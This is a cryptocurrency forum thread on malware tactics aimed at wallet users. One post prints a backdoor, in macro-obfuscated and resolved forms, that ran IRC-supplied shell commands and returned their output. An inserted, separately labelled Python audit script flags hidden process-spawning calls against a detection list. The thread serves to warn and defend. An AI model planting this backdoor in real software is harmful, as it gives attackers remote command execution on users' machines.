Hoxysado
|
|
May 06, 2018, 06:58:59 PM |
|
Thank you so much! I hope the people who committed that crime will find their punishment! And, of course, poor people who lost their money
|
|
|
|
Tonymillions
Newbie
Offline
Activity: 131
Merit: 0
|
|
May 07, 2018, 08:28:06 AM |
|
OMG
I can't believe this information. Thank you guys. I will pass the message across.
Thanks
|
|
|
|
Miminaha
Member
Offline
Activity: 368
Merit: 10
|
|
May 07, 2018, 09:38:33 PM |
|
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.

Here is the relevant source code:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

Here is the source code with macros resolved:

    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thank you so much for the information. I think we all must be more careful when we deal with our money - you have inspired me to review my antivirus
|
|
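Added example, not part of any post in this thread and not code from the coin's source: a small audit script for the case described above, where popen() was hidden behind macros (CRead, CLine, CFree, CBuff). It expands object-like #define macros across a source tree and reports process-spawning calls, marking the ones that only become visible after expansion. The header name obf.h, the #define lines and the SPAWN_CALLS list are assumptions constructed for the example.

```python
import re

# Calls that start a process or shell (a representative, not exhaustive, list).
SPAWN_CALLS = {"popen", "_popen", "system", "execl", "execlp", "execv",
               "execvp", "WinExec", "ShellExecuteA", "CreateProcessA"}
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)\s+(.+?)\s*$")
TOKEN_RE = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_]\w*')  # string or identifier
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')
CALL_RE = re.compile(r"([A-Za-z_]\w*)\s*\(")

def collect_macros(sources):
    """Gather object-like #define macros from every file in the tree."""
    macros = {}
    for text in sources.values():
        for line in text.splitlines():
            m = DEFINE_RE.match(line)
            if m:
                macros[m.group(1)] = m.group(2)
    return macros

def expand(line, macros, depth=8):
    """Substitute macros repeatedly; string literals are left untouched."""
    for _ in range(depth):
        new = TOKEN_RE.sub(lambda m: macros.get(m.group(0), m.group(0)), line)
        if new == line:
            break
        line = new
    return line

def spawn_calls(line):
    """Process-spawning functions called on this line, ignoring string contents."""
    return {c for c in CALL_RE.findall(STRING_RE.sub('""', line)) if c in SPAWN_CALLS}

def find_spawns(sources):
    """Return (file, line_no, call, hidden); hidden means visible only after expansion."""
    macros, findings = collect_macros(sources), []
    for name, text in sources.items():
        for no, raw in enumerate(text.splitlines(), 1):
            plain = spawn_calls(raw)
            for call in sorted(spawn_calls(expand(raw, macros))):
                findings.append((name, no, call, call not in plain))
    return findings

# Constructed sample: the post gives only the macro names and what they resolve to;
# the header name and the #define lines themselves are assumptions.
SAMPLE = {
    "obf.h": '#define CBuff "PRIVMSG"\n#define CLine FILE\n'
             '#define CRead popen\n#define CFree pclose\n',
    "irc.cpp": 'if (vWords[1] == CBuff && vWords[3] == ":!") {\n'
               '    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");\n'
               '    if (buf) CFree(buf);\n}\n'
               'printf("system(x) in a string is not a call");\n',
}
```

A finding with hidden set to True is the one to read first: a process-spawning call that a plain text search for popen or system would not have matched.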
|
|
Hoxysado
|
|
May 09, 2018, 07:58:02 PM |
|
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
Yeah, I can understand why you are so annoyed about it. Let's hope that they will work out something soon
|
|
|
|
bitbloq.io
Copper Member
Newbie
Offline
Activity: 33
Merit: 0
|
|
May 09, 2018, 08:00:26 PM |
|
I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.
|
|
|
|
Israel712
Newbie
Offline
Activity: 112
Merit: 0
|
|
May 10, 2018, 05:39:29 AM |
|
I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.
|
|
|
|
dangphananh
Newbie
Offline
Activity: 184
Merit: 0
|
|
May 10, 2018, 03:32:39 PM |
|
Bad software scares people the most, I use cash for complete security and I recommend doing so
|
|
|
|
Seram1
Newbie
Offline
Activity: 197
Merit: 0
|
|
May 10, 2018, 07:42:31 PM |
|
Thank you so much for the information. I think we all must be more careful when we deal with our money - you have inspired me to review my antivirus

Indeed we must always be careful in maintaining our assets, because there are always thieves everywhere. If your assets are gone you can not report where to go because it will be difficult to find him. Better prevent before something happens that we do not want.
|
|
|
|
Seram1
Newbie
Offline
Activity: 197
Merit: 0
|
|
May 10, 2018, 08:42:05 PM |
|
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
Yeah, I can understand why you are so annoyed about it. Let's hope that they will work out something soon

I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.
|
|
|
|
loinguyen1984
Newbie
Offline
Activity: 17
Merit: 0
|
|
May 11, 2018, 03:01:12 AM |
|
I am a new member, please help
|
|
|
|
kalstarzz
|
|
May 11, 2018, 06:07:50 PM |
|
This virus has spread and will hurt many people. If the antivirus is no longer functioning, how can we avoid the virus attack?
|
|
|
|
novak hiel
Newbie
Offline
Activity: 77
Merit: 0
|
|
May 13, 2018, 01:21:16 PM |
|
Are there still malware infection attempts? Thank you!!
|
|
|
|
Wiliam heil
Newbie
Offline
Activity: 70
Merit: 0
|
|
May 14, 2018, 09:04:31 AM |
|
I am a newbie and thanks for informing. I would like to ask how can we spot a scammer?
|
|
|
|
yetiripper
Full Member
Offline
Activity: 250
Merit: 100
The Future Of Work
|
|
May 14, 2018, 12:12:14 PM |
|
This year I am working on getting different wallets and a separate apple so that all the extra programs that I use do not counteract with the system operation itself.
|
|
|
|
edison benzamin
Newbie
Offline
Activity: 52
Merit: 0
|
|
May 15, 2018, 03:47:54 PM |
|
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
|
|
|
|
ProfessorZ
Copper Member
Jr. Member
Offline
Activity: 84
Merit: 1
|
|
May 15, 2018, 11:28:19 PM |
|
I recommend engraving the mnemonic phrase on a stainless steel plate (both fire and water-proof, high corrosion resistance) and bury it in a safe location; a very good method to hold longer than you have planned your coins; better than an air-gapped computer and 100% hack-proof.
|
|
|
|
omareckmac
Member
Offline
Activity: 434
Merit: 15
www.cd3d.app
|
|
May 16, 2018, 05:30:35 AM |
|
Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.
|
|
|
|
Crypto11021
Newbie
Offline
Activity: 107
Merit: 0
|
|
May 16, 2018, 07:56:27 AM |
|
If you can post the coins name it will be better
|
|
|
|
|
Negdan4ik
Member
Offline
Activity: 230
Merit: 10
The Exchange for EOS Community
|
|
May 16, 2018, 04:39:48 PM |
|
I think we should be very careful about the infestations. Thank you very much for the overview and useful information, I think that this site is very useful for scammers who want easy money. Forewarned is forearmed.
|
|
|
|
|